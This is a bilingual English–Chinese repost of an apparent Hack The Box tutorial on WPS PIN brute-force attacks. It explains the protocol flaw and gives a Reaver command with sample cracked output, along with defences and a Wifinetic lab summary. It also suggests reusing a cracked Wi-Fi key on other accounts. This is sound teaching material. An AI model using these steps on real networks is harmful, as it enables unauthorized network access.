Level up your Wi-Fi hacking! Understanding WPS and its older vulnerabilities is a good intro to wireless network security and how to detect, exploit, and mitigate them.
升级您的 Wi-Fi 黑客攻击!了解 WPS 及其较旧的漏洞是无线网络安全以及如何检测、利用和缓解它们的良好介绍。
Wi-Fi has become an essential network infrastructure in both homes and businesses due to the requirement to support mobile devices and network-connected smart devices.
由于需要支持移动设备和网络连接的智能设备,Wi-Fi已成为家庭和企业中必不可少的网络基础设施。
To simplify the connection of devices to a wireless network, the Wi-Fi Alliance introduced Wi-Fi Protected Setup (WPS) in 2006, which allowed the automated configuration of devices at the touch of a button or by entering a short PIN.
为了简化设备与无线网络的连接,Wi-Fi 联盟于 2006 年推出了 Wi-Fi 保护设置 (WPS),只需按一下按钮或输入短 PIN 即可自动配置设备。
However, in 2011, major vulnerabilities were discovered in the implementation of this protocol by a number of wireless access point manufacturers.
但是,在2011年,许多无线接入点制造商在实施该协议时发现了重大漏洞。
Users at that time realized that the feature was often enabled by default and worse, was still vulnerable even when WPS was disabled in the management user interface.
当时的用户意识到该功能通常是默认启用的,更糟糕的是,即使在管理用户界面中禁用WPS时,该功能仍然容易受到攻击。
The WPS vulnerabilities illustrate the difficulty in getting manufacturers of network devices to fully implement protocols and to implement security measures. Especially when these measures come at the cost of convenience and functionality.
WPS漏洞说明了让网络设备制造商完全实施协议和实施安全措施的困难。特别是当这些措施以牺牲便利性和功能性为代价时。
In the case of WPS PIN brute force attacks, end users were left with little option in some cases other than to wait for firmware updates or to purchase new devices.
在WPS PIN暴力攻击的情况下,最终用户在某些情况下别无选择,只能等待固件更新或购买新设备。
Although the original WPS PIN attack has been mitigated with updates, new wireless access points designed for the home or small office still support WPS through push button configuration. This remains a vulnerability for any device that an attacker has physical access to.
尽管最初的WPS PIN攻击已通过更新得到缓解,但为家庭或小型办公室设计的新无线接入点仍然通过按钮配置支持WPS。对于攻击者具有物理访问权限的任何设备,这仍然是一个漏洞。
Understanding WPS and its older vulnerabilities is a good introduction to wireless network security and how to detect, exploit, and mitigate them in a live environment.
了解 WPS 及其较旧的漏洞是对无线网络安全以及如何在实时环境中检测、利用和缓解它们的良好介绍。
Improve your wireless network security skills with Wifinetic
使用Wifinetic提高您的无线网络安全技能
-
Improve your understanding of Wi-Fi network vulnerabilities.
提高您对 Wi-Fi 网络漏洞的了解。 -
Learn to brute force WPS PINs to obtain the pre-shared key (PSK).
了解如何暴力破解 WPS PIN 以获取预共享密钥 (PSK)。 -
Get familiar with tools like Reaver and Aircrack-ng
熟悉Reaver和Aircrack-ng等工具
We’ve introduced a new innovative machine, Wifinetic, that allows users to explore wireless network vulnerabilities to develop skills in searching for vulnerabilities such as those found in the WPS protocol.
我们推出了一种新的创新机器Wifinetic,允许用户探索无线网络漏洞,以培养搜索漏洞的技能,例如WPS协议中发现的漏洞。
This would have normally required a hardware network setup in a lab but is delivered on the HTB platform through our virtualized environment.
这通常需要在实验室中进行硬件网络设置,但通过我们的虚拟化环境在HTB平台上提供。
What is WPS? 什么是WPS?
Wi-Fi Protected Setup (WPS), sometimes referred to as Wi-Fi Simple Configuration (WSC), is a network standard and protocol that allows devices to join a Wi-Fi network without using the network’s key.
Wi-Fi 保护设置 (WPS),有时也称为 Wi-Fi 简单配置 (WSC),是一种网络标准和协议,允许设备在不使用网络密钥的情况下加入 Wi-Fi 网络。
It is commonly used to attach smart devices such as TVs and printers to home Wi-Fi networks where inputting a complicated or long passphrase or key would be cumbersome.
它通常用于将电视和打印机等智能设备连接到家庭Wi-Fi网络,其中输入复杂或长密码或密钥会很麻烦。
How does WPS work?
WPS如何工作?
WPS calls the device wanting to connect to the network an “Enrollee” and the WPS logic that handles the authentication and configuration process the “Registrar”.
WPS 将想要连接到网络的设备称为“登记者”,将处理身份验证和配置过程的 WPS 逻辑称为“注册器”。
An access point (AP) allows the enrollee and registrar to communicate with each other. In most cases, the AP and registrar functions are combined as in the case of a wireless router for example.
接入点 (AP) 允许登记者和注册商相互通信。在大多数情况下,AP 和注册器功能是组合在一起的,例如无线路由器。
Access points can also support “external registrars”. External registrars connect with the access point using the same message exchange as the wireless clients outlined below.
接入点还可以支持“外部注册器”。外部注册商使用与下面概述的无线客户端相同的消息交换与接入点连接。
To connect a device via WPS, there are a few different modes of operation. The main two are:
要通过WPS连接设备,有几种不同的操作模式。主要有两个:
Push Button Configuration (PBC): The enrollee device and access point both have buttons that need to be pushed in sequence to initiate and confirm a connection. Once the button is pushed on the access point, the discovery mode of the connection process remains active for two minutes or less.
按钮配置 (PBC):登记者和接入点都有需要按顺序按下才能启动和确认连接的按钮。按下接入点上的按钮后,连接进程的发现模式将保持活动状态两分钟或更短时间。
The user then pushes a button on the connecting device to connect to the access point. This feature assumes that attackers would not have physical access to the router, a weakness we discuss more below.
然后,用户按下连接设备上的按钮以连接到接入点。此功能假设攻击者无法物理访问路由器,这是我们在下面详细讨论的弱点。
PIN Entry: An eight-digit, static PIN code is provided by the access point. Its input is required to authenticate a device for it to join the Wi-Fi network. The code is sometimes provided on a physical sticker on the access point, and can sometimes be changed via an administration interface.
PIN 输入:接入点提供八位数的静态 PIN 码。需要其输入来验证设备才能加入 Wi-Fi 网络。代码有时在接入点的物理标签上提供,有时可以通过管理界面进行更改。
WPS uses the IEEE 802.11 and Extensible Authentication Protocol (EAP) protocols for discovery and configuration. The flow of messages between the user, enrollee, and registrar is split into a discovery phase and a registration phase.
WPS 使用 IEEE 802.11 和可扩展身份验证协议 (EAP) 协议进行发现和配置。用户、登记者和注册商之间的消息流分为发现阶段和注册阶段。
The first two messages allow the enrollee and registrar to exchange public keys that are used in all subsequent messages. What follows is a proof that both the enrollee and registrar know the same PIN. This is done by taking the PIN and splitting it in two and using each half as a key. The PIN is eight digits long with the last digit being a checksum.
前两条消息允许登记者和注册商交换所有后续消息中使用的公钥。以下是登记者和注册商都知道相同 PIN 的证明。这是通过获取PIN并将其一分为二并使用每一半作为密钥来完成的。PIN 码长度为 8 位,最后一个数字是校验和。
|
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
|
1st Half of PIN |
2nd Half of PIN |
||||||
The enrollee and registrar can detect if either the first or second half of the PIN is wrong because they will receive a negative acknowledgment message in response to an incorrect proof of knowing that part of the PIN.
登记者和注册商可以检测 PIN 的前半部分或后半部分是否错误,因为他们将收到一条否定确认消息,以响应知道该部分 PIN 的错误证明。
This means that if the registrar receives a NACK after the M4 message, the first half of the PIN is incorrect and after the M6 message, the second half is incorrect.
这意味着,如果注册商在 M4 消息之后收到 NACK,则 PIN 的前半部分不正确,而在 M6 消息之后,后半部分不正确。
At the end of the process, the Wi-Fi password is shared with the enrollee, allowing it to join the network.
在该过程结束时,Wi-Fi 密码将与登记者共享,允许其加入网络。
The WPS PIN attack vulnerability
WPS PIN 攻击漏洞
Having seen how WPS uses the PIN, you may have already worked out that it is vulnerable to brute force attacks. If WPS had used all 7 available digits as the key (the checksum is always calculable and so can be ignored), there would be a potential 10^7 or 10,000,000 possible combinations making the prospect of a brute force attack unfeasible.
在了解了WPS如何使用PIN之后,您可能已经发现它容易受到暴力攻击。如果WPS使用所有7个可用数字作为键(校验和始终是可计算的,因此可以忽略),则可能存在10^7或10,000,000种可能的组合,使暴力攻击的前景变得不可行。
However, because each half of the PIN is checked independently, this reduces the permutations of the first half to 10^4 or 10,000 numbers and the second half of the PIN only 10^3 or 1,000 options.
This vulnerability was published by Stefan Viehböck in 2011. He created a proof of concept (POC) to exploit this vulnerability and tested a number of wireless access points to demonstrate the flaw.
此漏洞由 Stefan Viehböck 于 2011 年发布。他创建了一个概念验证(POC)来利用这个漏洞,并测试了许多无线接入点来证明这个漏洞。
In his POC, Viehböck used the authentication protocol for registering an external registrar with the access point. If an access point was vulnerable, the PIN could normally be cracked within 4 hours.
在他的 POC 中,Viehböck 使用身份验证协议向接入点注册外部注册商。如果接入点易受攻击,PIN 通常可以在 4 小时内被破解。
Exploiting WPS in practice
在实践中利用WPS
The first phase of an attack on a Wi-Fi access point is its discovery on a network. There are a number of tools for this with one of the more well-known being Aircrack-ng. Others include airmon-ng and airodump-ng.
对Wi-Fi接入点的攻击的第一阶段是在网络上发现它。有许多工具可以做到这一点,其中一个比较著名的是Aircrack-ng。其他包括airmon-ng和airodump-ng。
To use this tool, you will need to have a wireless network interface on your computer and have it set in “monitor mode” in order to be able to do things like scan for other wireless networks or even examine network packets.
Assuming this is in place, the tool airodump-ng will provide a list of available networks and provide details of the network’s Basic Service Set Identifier (BSSID) and their descriptive names or Extended Service Set Identifier (ESSID). You will also get information about the channels they are operating on and the authentication and cipher protocols they may be using.
In a real engagement, you would need to determine which of these networks were of interest and then look at potential vulnerabilities for each target of interest. Since this article is concerned with WPS PIN attacks, we are going to focus on that.
在实际参与中,您需要确定哪些网络是感兴趣的,然后查看每个感兴趣的目标的潜在漏洞。由于本文涉及WPS PIN攻击,因此我们将重点关注此。
💡Note: The retired HTB machine Olympus, which focuses on the use of Docker, features a small Wi-Fi section that involves cracking an offline Wi-Fi handshake using aircrack.
💡注意:退役的HTB机器奥林巴斯专注于Docker的使用,具有一个小的Wi-Fi部分,涉及使用Aircrack破解离线Wi-Fi握手。
Phase: Exploitation 阶段:开发
Tactic: WPS PIN attack 策略:WPS PIN攻击
Having scanned for Wi-Fi networks and found a potential target, we can switch to using a specific tool called Reaver that was created to brute force WPS PINs. Reaver uses the same approach as Stefan Viehböck’s POC. It uses IEEE 802.11/EAP to act as an external registrar authenticating with the target Wi-Fi access point.
扫描Wi-Fi网络并找到潜在目标后,我们可以切换到使用名为Reaver的特定工具,该工具旨在暴力破解WPS PIN。Reaver使用与Stefan Viehböck的POC相同的方法。它使用 IEEE 802.11/EAP 充当外部注册商,通过目标 Wi-Fi 接入点进行身份验证。
To perform the attack, Reaver is run with the following arguments:
为了执行攻击,Reaver 使用以下参数运行:
reaver -i <Interface name> -b <BSSID> -c <channel number> -vv (verbosity of output)
With these arguments, you will be able to follow the progress in cracking the PIN and once successful, Reaver will print out details of the PIN and any WPA PSK password it has discovered.
有了这些参数,您将能够跟踪破解PIN的进度,一旦成功,Reaver将打印出PIN的详细信息以及它发现的任何WPA PSK密码。
[+] Pin cracked in 2 seconds
[+]销钉在 2 秒内破裂
[+] WPS PIN: ‘12345670’
[+]WPS 密码:“12345670”
[+] WPA PSK: ‘Password123!’
[+]WPA PSK:“密码123!
Once you have obtained the Wi-Fi key, you would use it to potentially join the network and enumerate the resources accessible by that network. You might also check if the password has been used for authenticating other accounts that are discovered during the penetration of the network and associated systems.
获取 Wi-Fi 密钥后,您将使用它来潜在地加入网络并枚举该网络可访问的资源。您还可以检查密码是否已用于验证在渗透网络和相关系统期间发现的其他帐户。
Defense against WPS attacks
防御 WPS 攻击
The current specification of the Wi-Fi Protected Setup specification (version 2.0.8) has specific recommendations for implementers of the protocol to protect against brute force attacks of the PIN.
Wi-Fi 保护设置规范(版本 2.0.8)的当前规范为协议的实现者提供了具体的建议,以防止 PIN 的暴力攻击。
This includes using temporary PINs and implementing progressive delays in responding to requests that appear to be attempts to brute force the PIN. Another requirement is for the access point to enter a lock-down state after 10 failed attempts to guess the PIN from any external registrars trying to authenticate.
这包括使用临时 PIN 和在响应看似试图暴力破解 PIN 的请求时实施渐进式延迟。另一个要求是接入点在尝试从任何尝试进行身份验证的任何外部注册商猜测 PIN 失败 10 次失败后进入锁定状态。
Updating firmware on devices to implement fixes or purchasing an access point that has implemented an up-to-date version of WPS is important. WPS is normally configurable from the administration function, so if not in use, it should be turned off.
更新设备上的固件以实施修复程序或购买已实施最新版本WPS的接入点非常重要。WPS通常可以通过管理功能进行配置,因此如果不使用,则应将其关闭。
In the past, there were devices where even if WPS was disabled, the protocol could still be brute forced and so this should be checked in the particular models of devices. Since anyone with physical access to a device can simply push the WPS button to connect, physical access to access points should be controlled by putting them in locked cupboards or cages.
过去,有些设备即使禁用了WPS,协议仍然可以是暴力破解的,因此应在特定型号的设备中进行检查。由于任何对设备具有物理访问权限的人都可以简单地按下WPS按钮进行连接,因此应通过将接入点放在上锁的橱柜或笼子中来控制对接入点的物理访问。
Another vulnerability that we haven’t discussed is the so-called Pixie Dust vulnerability which is concerned with particular models of access points using specific chips.
我们尚未讨论的另一个漏洞是所谓的Pixie Dust漏洞,该漏洞涉及使用特定芯片的特定接入点型号。
This vulnerability involves limitations in the way random nonces were generated for the EAP authentication protocol.
此漏洞涉及为 EAP 身份验证协议生成随机随机数的方式限制。
The issue was that the nonces were not random and so the PIN could be easily brute forced knowing the nonces. Again, this issue has been fixed in more recent models of access point.
问题是随机数不是随机的,因此很容易暴力破解PIN知道随机数。同样,此问题已在较新的接入点模型中得到修复。
Develop your skills with HTB
通过HTB发展您的技能
Now that you have the theory and principles behind reconnaissance and enumeration of Wi-Fi networks, you can put it into practice using the Hack The Box machine Wifinetic.
现在您已经掌握了Wi-Fi网络侦察和枚举背后的理论和原理,您可以使用Hack The Box机器Wifinetic将其付诸实践。
What is special about this box is the fact that it is running an emulated wireless access point running a wireless network.
这个盒子的特别之处在于它正在运行一个运行无线网络的模拟无线接入点。
Wifinetic is an Easy difficulty Linux machine that focuses on wireless security. Initial enumeration reveals an exposed FTP service that has anonymous authentication enabled which allows you to download available files. One of the files is an OpenWRT backup.
Wifinetic是一款专注于无线安全的易难度Linux机器。初始枚举显示启用了匿名身份验证的公开 FTP 服务,该服务允许您下载可用文件。其中一个文件是OpenWRT备份。
OpenWRT is an operating system designed for wireless access points and routers based on Linux. Enumeration of the backup reveals a wireless network configuration that discloses an Access Point password. The contents of shadow or passwd files further disclose usernames on the server.
OpenWRT是一款专为基于Linux的无线接入点和路由器设计的操作系统。备份的枚举显示泄露接入点密码的无线网络配置。影子或密码文件的内容进一步泄露了服务器上的用户名。
With this information, a password reuse attack can be carried out on the SSH service running on the Wifinetic machine, allowing us to gain a foothold as the netadmin user. Using a variety of tools, the wireless networks the machine has access to can be enumerated revealing the OpenWRT network.
有了这些信息,就可以在Wifinetic机器上运行的SSH服务上进行密码重用攻击,使我们能够作为netadmin用户站稳脚跟。使用各种工具,可以枚举机器可以访问的无线网络,从而显示OpenWRT网络。
The utility Reaver is available on the machine and has been given capabilities to work on the wireless interface allowing it to be run and reveal the PIN and WPA key. This key can then be reused to gain access to root via SSH.
实用程序 Reaver 在机器上可用,并且已被赋予在无线接口上工作的功能,允许它运行并显示 PIN 和 WPA 密钥。然后可以重复使用此密钥以通过 SSH 访问根。
Further reading and resources
延伸阅读和资源
-
Wifinetic machine. 威芬蒂克机器。
-
Wifinetic walkthrough video by IppSec.
IppSec的Wifinetic演练视频。 -
Wifinetic write-up. 威芬蒂克写。
-
Wi-Fi Alliance WPS Information and specification
Wi-Fi 联盟 WPS 信息和规范
原文始发于felamos:WPS PIN attacks: How to crack WPS-enabled Wi-Fi networks with Reaver
转载请注明:WPS PIN attacks: How to crack WPS-enabled Wi-Fi networks with Reaver | CTF导航
相关文章
